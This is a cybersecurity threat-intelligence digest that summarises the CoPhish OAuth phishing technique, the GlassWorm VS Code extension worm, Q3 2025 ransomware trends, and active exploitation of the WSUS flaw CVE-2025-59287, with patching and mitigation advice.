- with readers working within the Property industries
- within Insurance, Wealth Management and Tax topic(s)
Malware Activity
Phishing via Microsoft Copilot and Self-Spreading Malware in Developer Tools
Cybersecurity researchers have uncovered two significant threats affecting users and developers. First, they identified a new phishing technique called 'CoPhish' that exploits Microsoft Copilot Studio agents to deceive users into granting access through fake OAuth consent prompts. These malicious chatbot agents mimic legitimate Microsoft domaintricking users into clicking customized login buttons that redirect to harmful sites, steal session tokens, hijack accounts and in some cases, high-privilege admin roles. Although Microsoft plans to fix these issues in future updates, current vulnerabilities remain exploitable. Second, a sophisticated malware named GlassWorm has been discovered infecting Visual Studio Code extensions available on popular platforms. This self-spreading worm uses the Solana blockchain and Google Calendar as command-and-control centers to avoid detection and takedown. It employs techniques like invisible Unicode characters to hide malicious code and target widely used extensions thus, infecting thousands of downloads. Once inside, it can steal credentials, drain cryptocurrency wallets, and convert developer machines into tools for cybercriminal activitiescommunicating through decentralized networks for resilience. These threats highlight the growing risks in cloud and developer environments, underscoring the importance of strict security policies, cautious permission practices, and continuous monitoring to protect against evolving cyber-attacks. CTIX analysts will continue to report on the latest malware strains and attack methodologies.
- BleepingComputer: New CoPhish Attack Steals OAuth Tokens via Copilot Studio Agents article
- TheHackerNews: Self-Spreading 'GlassWorm' Infects VS Code Extensions in Widespread Supply Chain Attack article
Threat Actor Activity
Q3 Threat Actor Trends in The Cyber Extortion Economy
As 2025 concludes, the cyber extortion landscape has bifurcated into two (2) main strategies: volume-driven Ransomware-as-a-Service (RaaS) campaigns targeting mid-market companies and high-cost, targeted intrusions aimed at larger enterprises. The Akira RaaS group exemplifies the former, exploiting vulnerabilities to execute numerous attacks with low demands but high ransom payment rates. This model focuses on maximizing attack volume regardless of victim size, thus maintaining market share. Conversely, some groups focus on high-value targets, though this is costly and yields lower payment rates. Larger enterprises become targets when extortion campaigns exploit widely used software or hardware, as seen in CLoP and Scattered Spider's activities. In Q3, ransomware groups expanded into enterprise environments with targeted methods. Insider threats are emerging, such as the Medusa ransomware gang's attempt to bribe a BBC employee for network access. This marks a shift from typical data-theft events to more direct ransomware deployment through insider collaboration. Ransomware economics have evolved from low-cost operations to more complex RaaS models that include data theft. As profits thin and trust between developers and affiliates erode, some groups abandon ransomware for data-theft-only strategies. This shift, coupled with declining ransom payment rates, reflects a contracting cyber extortion economy. In Q3 2025, the average ransom payment dropped significantly, with large enterprises resisting pressure to pay. Mid-market attacks, while more frequent, resulted in lower payments. Ransom payment rates fell to a record low of 23%, highlighting collective progress in defense strategies. Common attack vectors remain remote access compromise, phishing, and software vulnerability exploitation. Exfiltration, lateral movement, and command-and-control tactics dominate, with discovery activities providing early detection opportunities. Ransomware attacks remain opportunistic, exploiting accessible entry points rather than specific industries. The median company size rose to 362 employees, challenging assumptions that larger targets guarantee larger payouts. As the landscape evolves, organizations must enhance insider threat programs and adapt to new extortion tactics. CTIX analysts remain committed to providing the latest updates to threat actor activity and emerging threats.
Vulnerabilities
Active Exploitation of Critical WSUS Remote Code Execution Vulnerability
A critical Windows Server Update Services (WSUS) remote code execution (RCE) vulnerability is under active exploitation following the public release of proof-of-concept code. The flaw, tracked as CVE-2025-59287 (CVSS 9.8/10), is caused by unsafe deserialization of untrusted AuthorizationCookie objects using BinaryFormatter in a legacy serialization mechanism, allowing unauthenticated attackers to execute arbitrary code with SYSTEM privileges on Windows servers with the WSUS Server Role enabled. Microsoft initially addressed the issue during Patch Tuesday but later re-released out-of-band patches (KB5070881, and KB5070887) to fully mitigate it across all supported Windows Server versions. Successful exploitation enables attackers to remotely execute PowerShell and cmd.exe commands, download and run Base64-encoded payloads, and enumerate network and domain information (whoami, net user/domain, ipconfig/all) before exfiltrating data to attacker-controlled webhooks. Threat activity was first observed between October 23 - 24, 2025, by Eye Security, Huntress, and the Dutch National Cyber Security Centre (NCSC-NL), with over 2,500 WSUS servers found publicly exposed (some within high-value environments). Given the vulnerability's wormable potential and active exploitation, organizations are strongly urged to apply Microsoft's out-of-band patches immediately or, if patching is not possible, to disable the WSUS Server Role and block inbound ports 8530 and 8531. The U.S. Cybersecurity and Infrastructure Security (CISA) has added CVE-2025-59287 to its Known Exploited Vulnerabilities (KEV) catalog, mandating federal remediation by no later than November 14, 2025. CTIX analysts strongly urge administrators to ensure that all vulnerable systems are patched before the deadline.
The content of this article is intended to provide a general guide to the subject matter. Specialist advice should be sought about your specific circumstances.
